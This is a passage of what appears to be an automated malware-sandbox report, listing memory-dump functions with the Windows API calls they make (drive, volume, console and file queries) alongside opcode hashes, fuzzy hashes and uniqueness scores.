                                                        • String ID:
                                                        • API String ID: 2738559852-0
                                                        • Opcode ID: 28f189a87c8732a92138f685052133067f106e7a2d637252a86db1e5f1e8e1cd
                                                        • Instruction ID: 9e8c2f188572c8837a05c9cafdc708eb4640a74bacb1fc8483f34ada7fd0d950
                                                        • Opcode Fuzzy Hash: 28f189a87c8732a92138f685052133067f106e7a2d637252a86db1e5f1e8e1cd
                                                        • Instruction Fuzzy Hash: D011EC7A400704EFEB21CF50DC80FA6FBA8EF04320F08846AE909AA241C270A904CBB1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01CAA33C, Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetErrorMode.KERNELBASE(?), ref: 01CAA39C
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.2120441395.0000000001CAA000.00000040.00000001.sdmp, Offset: 01CAA000, based on PE: false
                                                        Similarity
                                                        • API ID: ErrorMode
                                                        • String ID:
                                                        • API String ID: 2340568224-0
                                                        • Opcode ID: 5a97ba85966daa22ca30dd587c4e7cfbfaea3f0ce1b39950c06c85a44839d1a8
                                                        • Instruction ID: 4b33d4dea2f4ba0fdb99ffd6c80c380c56ffd1bb7b68cf1e8c78ffb22680d984
                                                        • Opcode Fuzzy Hash: 5a97ba85966daa22ca30dd587c4e7cfbfaea3f0ce1b39950c06c85a44839d1a8
                                                        • Instruction Fuzzy Hash: BE116D714093C09FE7228B15DC54AA2BFB4DF47614F0880CAEDC48B253D265A908DB62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 028912D8, Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetConsoleTextAttribute.KERNEL32(?,?), ref: 0289132F
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.2124622211.0000000002890000.00000040.00000001.sdmp, Offset: 02890000, based on PE: false
                                                        Similarity
                                                        • API ID: AttributeConsoleText
                                                        • String ID:
                                                        • API String ID: 646522457-0
                                                        • Opcode ID: 47f35cd502be981772125ed16cfc3d71ed311d7281a6a64f8eb524505b3ec158
                                                        • Instruction ID: 7ff552f2b4940dcd4752ec83cdb38a7de1683d773726d195da367f6a054222da
                                                        • Opcode Fuzzy Hash: 47f35cd502be981772125ed16cfc3d71ed311d7281a6a64f8eb524505b3ec158
                                                        • Instruction Fuzzy Hash: EB11C1755083809FDB218F25DC49B96FFE4EF06220F0884EEED498B252D239A808CB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 028905E8, Relevance: 1.6, APIs: 1, Instructions: 54fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • UnmapViewOfFile.KERNELBASE(?), ref: 02890640
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.2124622211.0000000002890000.00000040.00000001.sdmp, Offset: 02890000, based on PE: false
                                                        Similarity
                                                        • API ID: FileUnmapView
                                                        • String ID:
                                                        • API String ID: 2564024751-0
                                                        • Opcode ID: 7f593e02ffb7099e4450993ce2d0bb44a7443d27790b98b0605d5fc3939687c6
                                                        • Instruction ID: 7730d4c4cd87f91a8b5795a154f9b320aa8226808865372bce223c9e67afe854
                                                        • Opcode Fuzzy Hash: 7f593e02ffb7099e4450993ce2d0bb44a7443d27790b98b0605d5fc3939687c6
                                                        • Instruction Fuzzy Hash: 951106755097C09FDB128B15DC54B52FFB4DF02220F08C0DBEC858B253D265A908CB62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01CAAAD2, Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 01CAAB1A
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.2120441395.0000000001CAA000.00000040.00000001.sdmp, Offset: 01CAA000, based on PE: false
                                                        Similarity
                                                        • API ID: LookupPrivilegeValue
                                                        • String ID:
                                                        • API String ID: 3899507212-0
                                                        • Opcode ID: ae2276a01e4fbc6991957793fb4164b9f0a95ef485ce0a55501de895a6af2be0
                                                        • Instruction ID: 08040a5790a98e25a83efa05cf91c4520ca8c039edb12b76c6d4c6239fc21f46
                                                        • Opcode Fuzzy Hash: ae2276a01e4fbc6991957793fb4164b9f0a95ef485ce0a55501de895a6af2be0
                                                        • Instruction Fuzzy Hash: D2118EB2600701CFEB21CF2ADC85B96FBD8EB04224F08C46ADD09CB642D675E904CA71
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01CAAA0F, Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetConsoleOutputCP.KERNEL32 ref: 01CAAA71
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.2120441395.0000000001CAA000.00000040.00000001.sdmp, Offset: 01CAA000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleOutput
                                                        • String ID:
                                                        • API String ID: 3985236979-0
                                                        • Opcode ID: f3ea4cc8f0fe2da427005fadfbee9bbc20dc5f1330d78d7f1d18189ba7bdb9fa
                                                        • Instruction ID: a64309967dc0ae916d4d48566c3289f520575857bdf2be3b91ff13a47904e81b
                                                        • Opcode Fuzzy Hash: f3ea4cc8f0fe2da427005fadfbee9bbc20dc5f1330d78d7f1d18189ba7bdb9fa
                                                        • Instruction Fuzzy Hash: BB11917640D7C09FD7128B15DC95A91BFA4EF03224F0980DBDD858F1A3D269A909DB62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0289092F, Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetSystemInfo.KERNELBASE(?), ref: 0289099C
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.2124622211.0000000002890000.00000040.00000001.sdmp, Offset: 02890000, based on PE: false
                                                        Similarity
                                                        • API ID: InfoSystem
                                                        • String ID:
                                                        • API String ID: 31276548-0
                                                        • Opcode ID: 45a53c1945fe00c436af65f10897cb37551604d2534775e7eba30cd5e3cc67be
                                                        • Instruction ID: 545b4a3966dc9775ec403a6c32b5f1773d931e9c5baa69def45ee9a62b53a7f5
                                                        • Opcode Fuzzy Hash: 45a53c1945fe00c436af65f10897cb37551604d2534775e7eba30cd5e3cc67be
                                                        • Instruction Fuzzy Hash: 6D1190758097C09FE7228B25DC55B92BFA4EF07324F09C0DAD9888B163C265A908CB62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 028907C6, Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetFileType.KERNELBASE(?,00000E9C,93CF84E6,00000000,00000000,00000000,00000000), ref: 02890819
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.2124622211.0000000002890000.00000040.00000001.sdmp, Offset: 02890000, based on PE: false
                                                        Similarity
                                                        • API ID: FileType
                                                        • String ID:
                                                        • API String ID: 3081899298-0
                                                        • Opcode ID: b71a6ca6017706889ed74f3356d6f34a3b0c37c316c4c8d9812a461c43f099f8
                                                        • Instruction ID: ca9a316d6af78329e8f14dd0fac3e31323a1b1b241fd692bb6bf6726bdb3372d
                                                        • Opcode Fuzzy Hash: b71a6ca6017706889ed74f3356d6f34a3b0c37c316c4c8d9812a461c43f099f8
                                                        • Instruction Fuzzy Hash: 9201927A600704EFFB20DF15DC85FA6FB98DF44765F18C096ED09AB281D674A904CAB2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 028913AA, Relevance: 1.6, APIs: 1, Instructions: 51COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.2124622211.0000000002890000.00000040.00000001.sdmp, Offset: 02890000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleWrite
                                                        • String ID:
                                                        • API String ID: 2657657451-0
                                                        • Opcode ID: bbe2f68d2e6d5493c07bdf557e1dd8fb97b7b9fb1bac5a1fe330f09765c1ef16
                                                        • Instruction ID: eb03f1b1dc9ede437ed400b23972dfb61b9b5f2f6c83c65fa562155beb763768
                                                        • Opcode Fuzzy Hash: bbe2f68d2e6d5493c07bdf557e1dd8fb97b7b9fb1bac5a1fe330f09765c1ef16
                                                        • Instruction Fuzzy Hash: B111797A504700DFEF20CF56D889B66FBA4EB05620F08C4AAED4ACA652D275E408DA61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01CAAB75, Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetLogicalDrives.KERNELBASE ref: 01CAABC9
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.2120441395.0000000001CAA000.00000040.00000001.sdmp, Offset: 01CAA000, based on PE: false
                                                        Similarity
                                                        • API ID: DrivesLogical
                                                        • String ID:
                                                        • API String ID: 999431828-0
                                                        • Opcode ID: 77604b2d8e07a280e335c9e9c9698a0e27be92b944b56fe69be7f6b4a717899c
                                                        • Instruction ID: 59f25fef2f749a0f6db9e17648dc5d2230ef91f85eebf4629c4c65a0680e1667
                                                        • Opcode Fuzzy Hash: 77604b2d8e07a280e335c9e9c9698a0e27be92b944b56fe69be7f6b4a717899c
                                                        • Instruction Fuzzy Hash: FE11C2B54097809FDB11CF15DC85B82BFA4EF02224F0980ABDD498F153D275A508CB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01CABA32, Relevance: 1.5, APIs: 1, Instructions: 49fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateFileW.KERNELBASE(?,?,?,?,?,?,?), ref: 01CABA7E
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.2120441395.0000000001CAA000.00000040.00000001.sdmp, Offset: 01CAA000, based on PE: false
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID:
                                                        • API String ID: 823142352-0
                                                        • Opcode ID: 5bcbb15dfaf193cf0757e173a089065bed5e63f8e820d6465b652d62fdb1a89c
                                                        • Instruction ID: 76d8c98b3bcc6d88cda25cc7135786b1e5c4693d1e5e76ef6a53eb9d352bdffb
                                                        • Opcode Fuzzy Hash: 5bcbb15dfaf193cf0757e173a089065bed5e63f8e820d6465b652d62fdb1a89c
                                                        • Instruction Fuzzy Hash: E9118E72500700DFEB22CF55DC45B52FFE4EF04215F08C4AADD498A612D371E914DB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01CAA1EE, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetConsoleCtrlHandler.KERNEL32(?,00000E9C,?,?), ref: 01CAA23E
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.2120441395.0000000001CAA000.00000040.00000001.sdmp, Offset: 01CAA000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleCtrlHandler
                                                        • String ID:
                                                        • API String ID: 1513847179-0
                                                        • Opcode ID: e7694d83b4c4b452930acc3eaf10cfe163f0350775db8b3963ac059a6fc834a2
                                                        • Instruction ID: 8a93745a101448afae7c586c5408140189fc65483ad5eaf8591920dcf403c861
                                                        • Opcode Fuzzy Hash: e7694d83b4c4b452930acc3eaf10cfe163f0350775db8b3963ac059a6fc834a2
                                                        • Instruction Fuzzy Hash: 64018471900700AFE350DF16DD46B66FBE8FB84A20F14816AED089B741D235F915CBE5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02890196, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetConsoleTitleW.KERNEL32(?), ref: 028901D0
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.2124622211.0000000002890000.00000040.00000001.sdmp, Offset: 02890000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleTitle
                                                        • String ID:
                                                        • API String ID: 3358957663-0
                                                        • Opcode ID: 3bf74a4846a1bd924f73dd9e597c3849ac9df09cfc91a3fe3e7be97b01f2e7e1
                                                        • Instruction ID: 0be63756593ff8ef0a0c664007b44f26ebff7d89e44ddda2191f43cfb28a1eaa
                                                        • Opcode Fuzzy Hash: 3bf74a4846a1bd924f73dd9e597c3849ac9df09cfc91a3fe3e7be97b01f2e7e1
                                                        • Instruction Fuzzy Hash: 28019E796047048FEB50DF65DC857A6FBE8DB00224F08C4AADC09CB642D774E404CA61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0289104E, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetVolumeInformationW.KERNELBASE(?,00000E9C,?,?), ref: 0289109E
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.2124622211.0000000002890000.00000040.00000001.sdmp, Offset: 02890000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationVolume
                                                        • String ID:
                                                        • API String ID: 2039140958-0
                                                        • Opcode ID: 656c44b812b545491fe35bd1d60e7047c773f3901f0b613701d034475bf2f19b
                                                        • Instruction ID: d93f9ef37d613f6e611dccd4715da00a958199276e5927db209506fafdbcb2f6
                                                        • Opcode Fuzzy Hash: 656c44b812b545491fe35bd1d60e7047c773f3901f0b613701d034475bf2f19b
                                                        • Instruction Fuzzy Hash: 92017171900600AFE350DF16DD46B66FBA8FB84A20F14816AED089B741D235B915CBE5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01CABAFA, Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.2120441395.0000000001CAA000.00000040.00000001.sdmp, Offset: 01CAA000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleMode
                                                        • String ID:
                                                        • API String ID: 4145635619-0
                                                        • Opcode ID: c6ed330a78a9cc4a1f02038b13fb5a0575d6a65e7e4ba8a910548d203b4f0bef
                                                        • Instruction ID: 25d6d320ddaf6994cb4cffe845de0e45ee7b046af4c022bfb40b0364497b7966
                                                        • Opcode Fuzzy Hash: c6ed330a78a9cc4a1f02038b13fb5a0575d6a65e7e4ba8a910548d203b4f0bef
                                                        • Instruction Fuzzy Hash: 1B01DF71900701DFEB21CF19EC857A5FFA4EF04624F48C4AADD098B656D275E904CB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 028912FA, Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetConsoleTextAttribute.KERNEL32(?,?), ref: 0289132F
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.2124622211.0000000002890000.00000040.00000001.sdmp, Offset: 02890000, based on PE: false
                                                        Similarity
                                                        • API ID: AttributeConsoleText
                                                        • String ID:
                                                        • API String ID: 646522457-0
                                                        • Opcode ID: 9bfd627f6b18df7fcaa813309f139c3fab4e9919a069515ee5ed2c2b81f28867
                                                        • Instruction ID: 8cac4b6ed2a9872008a1f3af598a10f8dcf5a68d4e05f171b0bd522c8c04a451
                                                        • Opcode Fuzzy Hash: 9bfd627f6b18df7fcaa813309f139c3fab4e9919a069515ee5ed2c2b81f28867
                                                        • Instruction Fuzzy Hash: 0701BC79908700DFEF208F15D8897A5FBA4EF04624F0CC4AAEC09CB642D279A404DB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01CAA8FA, Relevance: 1.5, APIs: 1, Instructions: 43threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetThreadPreferredUILanguages.KERNEL32(?,00000E9C,?,?), ref: 01CAA94A
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.2120441395.0000000001CAA000.00000040.00000001.sdmp, Offset: 01CAA000, based on PE: false
                                                        Similarity
                                                        • API ID: LanguagesPreferredThread
                                                        • String ID:
                                                        • API String ID: 842807343-0
                                                        • Opcode ID: 817591a9d8f0f54abe50e5c5a7a9167216c5c75789f07621c1b7f819a9362aa3
                                                        • Instruction ID: 81297087391b02174b724a0601ab0d74c8ff3339c520bc4d43194571a2ae4e1a
                                                        • Opcode Fuzzy Hash: 817591a9d8f0f54abe50e5c5a7a9167216c5c75789f07621c1b7f819a9362aa3
                                                        • Instruction Fuzzy Hash: 60016271900601ABD360DF16DD46B26FBA4FB88B20F14815AED085B741D275F915CBE6
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 028904B2, Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SHGetFolderPathW.SHELL32(?,00000E9C,?,?), ref: 02890502
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.2124622211.0000000002890000.00000040.00000001.sdmp, Offset: 02890000, based on PE: false
                                                        Similarity
                                                        • API ID: FolderPath
                                                        • String ID:
                                                        • API String ID: 1514166925-0
                                                        • Opcode ID: ac65109efe0dd3b5572f8df56aa7a8661fa04587af9891bebe53fea140bf7747
                                                        • Instruction ID: 6f00cfae4d02a9a8d1454cc5c1b3874bd2330e96ed579b32a642f55524287c21
                                                        • Opcode Fuzzy Hash: ac65109efe0dd3b5572f8df56aa7a8661fa04587af9891bebe53fea140bf7747
                                                        • Instruction Fuzzy Hash: C0016271900601ABD360DF16DD46B26FBA4FB88B20F14815AED085B741D275F915CBE6
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02890F76, Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetDriveTypeW.KERNELBASE(?), ref: 02890FB0
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.2124622211.0000000002890000.00000040.00000001.sdmp, Offset: 02890000, based on PE: false
                                                        Similarity
                                                        • API ID: DriveType
                                                        • String ID:
                                                        • API String ID: 338552980-0
                                                        • Opcode ID: 62e7a7525214aa91c6efa216dcde56402bb00452f3fbf06d6c2076efd785a3c8
                                                        • Instruction ID: 894c7c13fe102b122d7786a609acaf6955d33f61fef050ab806ffc627001e68f
                                                        • Opcode Fuzzy Hash: 62e7a7525214aa91c6efa216dcde56402bb00452f3fbf06d6c2076efd785a3c8
                                                        • Instruction Fuzzy Hash: 13017C79504744DFEB20DF15D885B66FB94EB00624F08C4AADC08CF686E374E544CAA2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0289060E, Relevance: 1.5, APIs: 1, Instructions: 39fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • UnmapViewOfFile.KERNELBASE(?), ref: 02890640
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.2124622211.0000000002890000.00000040.00000001.sdmp, Offset: 02890000, based on PE: false
                                                        Similarity
                                                        • API ID: FileUnmapView
                                                        • String ID:
                                                        • API String ID: 2564024751-0
                                                        • Opcode ID: 848d55fdccbe89f8eeb5836c739784daeb286391165c329680230fdb795b4a2f
                                                        • Instruction ID: 686f6110aaffb7eba990b44f68f95593335c33886addb145c20bc346a85ae2bd
                                                        • Opcode Fuzzy Hash: 848d55fdccbe89f8eeb5836c739784daeb286391165c329680230fdb795b4a2f
                                                        • Instruction Fuzzy Hash: 9001F479500704CFEF218F15D885761FBA0DF41624F08C0AADC098B753D375E804DAA2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01CAAB9A, Relevance: 1.5, APIs: 1, Instructions: 38COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetLogicalDrives.KERNELBASE ref: 01CAABC9
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.2120441395.0000000001CAA000.00000040.00000001.sdmp, Offset: 01CAA000, based on PE: false
                                                        Similarity
                                                        • API ID: DrivesLogical
                                                        • String ID:
                                                        • API String ID: 999431828-0
                                                        • Opcode ID: 85b3b905653608c8e324697a54dca7ce314c9ab95d08c8ff3c59905dd3282a98
                                                        • Instruction ID: a193afcfe4e476c4294cf7f36bbb48517b9e59d741339ec2d938f11888c0e5da
                                                        • Opcode Fuzzy Hash: 85b3b905653608c8e324697a54dca7ce314c9ab95d08c8ff3c59905dd3282a98
                                                        • Instruction Fuzzy Hash: 7401D131404740DFEB11DF1AE885791FBA4DF04224F48C4AACD098F642D275E504CBA2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02891116, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetThreadUILanguage.KERNEL32(?), ref: 02891148
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.2124622211.0000000002890000.00000040.00000001.sdmp, Offset: 02890000, based on PE: false
                                                        Similarity
                                                        • API ID: LanguageThread
                                                        • String ID:
                                                        • API String ID: 243849632-0
                                                        • Opcode ID: 4574e0556bd5894b07a676dbd3025e16c4d4808a2a9fff149e7cba06df317d13
                                                        • Instruction ID: 91bd095a6ced569c31068a7e65cf3e637883c2c7e9eb48daed8c2a25ea6fe5a9
                                                        • Opcode Fuzzy Hash: 4574e0556bd5894b07a676dbd3025e16c4d4808a2a9fff149e7cba06df317d13
                                                        • Instruction Fuzzy Hash: 67F0AF39508744EFEB20CF05D889765FBA4EF05A25F08C09ADD4D8B752D679A444CEA2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01CAA36A, Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetErrorMode.KERNELBASE(?), ref: 01CAA39C
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.2120441395.0000000001CAA000.00000040.00000001.sdmp, Offset: 01CAA000, based on PE: false
                                                        Similarity
                                                        • API ID: ErrorMode
                                                        • String ID:
                                                        • API String ID: 2340568224-0
                                                        • Opcode ID: 516b58bd12fd1ca9438299c53fee4daf79f1df591f3a4c63533514c1d6b51532
                                                        • Instruction ID: 304bb64e7a670966853424b516a2f078f59ee8225531a12001be5c26dd53374a
                                                        • Opcode Fuzzy Hash: 516b58bd12fd1ca9438299c53fee4daf79f1df591f3a4c63533514c1d6b51532
                                                        • Instruction Fuzzy Hash: C9F0C235505744DFEB21DF06D885765FFA0EF04B25F48C09ADD094B352D3B5E908CAA2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0289096A, Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetSystemInfo.KERNELBASE(?), ref: 0289099C
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.2124622211.0000000002890000.00000040.00000001.sdmp, Offset: 02890000, based on PE: false
                                                        Similarity
                                                        • API ID: InfoSystem
                                                        • String ID:
                                                        • API String ID: 31276548-0
                                                        • Opcode ID: aad586155bc735daa78001b0a5d6aae3150357353d563c57230fdf36e713c5f4
                                                        • Instruction ID: c4e92d656e22f35d132ccda620f5a4edab1414d903e9aa72cfacd0d93845a3e8
                                                        • Opcode Fuzzy Hash: aad586155bc735daa78001b0a5d6aae3150357353d563c57230fdf36e713c5f4
                                                        • Instruction Fuzzy Hash: 84F0C239904744DFEF20DF05D885765FFA0EF15726F08C09ADD498B356D375A404CAA2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01CAAA42, Relevance: 1.5, APIs: 1, Instructions: 34COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetConsoleOutputCP.KERNEL32 ref: 01CAAA71
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.2120441395.0000000001CAA000.00000040.00000001.sdmp, Offset: 01CAA000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleOutput
                                                        • String ID:
                                                        • API String ID: 3985236979-0
                                                        • Opcode ID: 44c6c572d38597426e63d1064b2c583ac5b2b2a3c17412701197ca94c30528f4
                                                        • Instruction ID: 6889d2e1fd98d50b058abc49a8ed5e3774c7f861e67de9b9f374ab62a94440c3
                                                        • Opcode Fuzzy Hash: 44c6c572d38597426e63d1064b2c583ac5b2b2a3c17412701197ca94c30528f4
                                                        • Instruction Fuzzy Hash: 9EF0C232504B41CFEB11CF06D98A761FBD0DF04625F48C09ADD094B252D278E904CFA2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01CAA974, Relevance: 1.3, APIs: 1, Instructions: 54COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CloseHandle.KERNELBASE(?), ref: 01CAA9C8
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.2120441395.0000000001CAA000.00000040.00000001.sdmp, Offset: 01CAA000, based on PE: false
                                                        Similarity
                                                        • API ID: CloseHandle
                                                        • String ID:
                                                        • API String ID: 2962429428-0
                                                        • Opcode ID: 236d0e8cffe1ed2d13f061d4d5fe44e8450d7573e0bb46808319043a6bc35495
                                                        • Instruction ID: be6ceae363b44bd7710c6f711729cb74828a1343711554eb8257cb7b1db5e631
                                                        • Opcode Fuzzy Hash: 236d0e8cffe1ed2d13f061d4d5fe44e8450d7573e0bb46808319043a6bc35495
                                                        • Instruction Fuzzy Hash: 1F1191715093809FD712CF25DC55B92BFE4DF02224F0980ABED458B253D275A908CB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01CAA996, Relevance: 1.3, APIs: 1, Instructions: 43COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CloseHandle.KERNELBASE(?), ref: 01CAA9C8
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.2120441395.0000000001CAA000.00000040.00000001.sdmp, Offset: 01CAA000, based on PE: false
                                                        Similarity
                                                        • API ID: CloseHandle
                                                        • String ID:
                                                        • API String ID: 2962429428-0
                                                        • Opcode ID: 65985d7c3aa8c5a39d447fccd787fb9e2dfa80dc75c9d1d2e4d3209ad4565fb3
                                                        • Instruction ID: c74484d275f4f6155c0e5f1513f3f818d70857389adcfc9c81f8f34910988c5a
                                                        • Opcode Fuzzy Hash: 65985d7c3aa8c5a39d447fccd787fb9e2dfa80dc75c9d1d2e4d3209ad4565fb3
                                                        • Instruction Fuzzy Hash: B501F275500780DFEB21DF2ADC857A6FBE4DF00224F48C0ABDC098B642D275E904CB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 028D07F7, Relevance: .0, Instructions: 47COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.2124688856.00000000028D0000.00000040.00000040.sdmp, Offset: 028D0000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 4c5d700337a57491144a8eea1ce73d5b3c057422b3daa78846df7f646cc2285a
                                                        • Instruction ID: e74d6589d51a120e50c9bf58c2f22954162ee78ae3a830a43f144f7ebdc83611
                                                        • Opcode Fuzzy Hash: 4c5d700337a57491144a8eea1ce73d5b3c057422b3daa78846df7f646cc2285a
                                                        • Instruction Fuzzy Hash: 3A01DBB69097806FD7128F05EC40862FFB8DE46570709C09BEC49CB612D1256D08CBB2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 028D081E, Relevance: .0, Instructions: 27COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.2124688856.00000000028D0000.00000040.00000040.sdmp, Offset: 028D0000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f6a1c2f3c93db24932c9c62a9dcc1f87e96dccf672ef313ec20f99c708ec0118
                                                        • Instruction ID: 65728f8e3037e6613e3c7a723f54b490d53e49d3af0b588ac9fdb1725e66a00b
                                                        • Opcode Fuzzy Hash: f6a1c2f3c93db24932c9c62a9dcc1f87e96dccf672ef313ec20f99c708ec0118
                                                        • Instruction Fuzzy Hash: A8E09276A04B008BD750CF0AEC41452F7D4EB84A30B18C07FDC0D8B701D139B504CAA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 05810862, Relevance: .0, Instructions: 24COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.2156193371.0000000005810000.00000040.00000001.sdmp, Offset: 05810000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2e602cfe96f1b6bfcf8b5b480480997c3071a7d4dd32ef49a45b63fd3736b11c
                                                        • Instruction ID: 3a81986b41369db248627b42a96d3507e748fd2642e7cbb7ef503cdbbc8d61eb
                                                        • Opcode Fuzzy Hash: 2e602cfe96f1b6bfcf8b5b480480997c3071a7d4dd32ef49a45b63fd3736b11c
                                                        • Instruction Fuzzy Hash: 90E04F1120F3D04FC3079374A8A4966BF721E9301870F41EBD196CF5A3D6599C49E7A3
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01CA23F4, Relevance: .0, Instructions: 15COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.2120421678.0000000001CA2000.00000040.00000001.sdmp, Offset: 01CA2000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2868198fb60b645150fee8bd481def3a0129d9c5a7c75d69e41eeb53adff59e4
                                                        • Instruction ID: d2de21bed4a80f2aa9d16474416127fb923022a091410bfc1128610aecd0bdd7
                                                        • Opcode Fuzzy Hash: 2868198fb60b645150fee8bd481def3a0129d9c5a7c75d69e41eeb53adff59e4
                                                        • Instruction Fuzzy Hash: 27D05E79204B928FE7178A1CC1A4B953BA4AF55B08F8644F9E840CB6A3C768E681E200
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

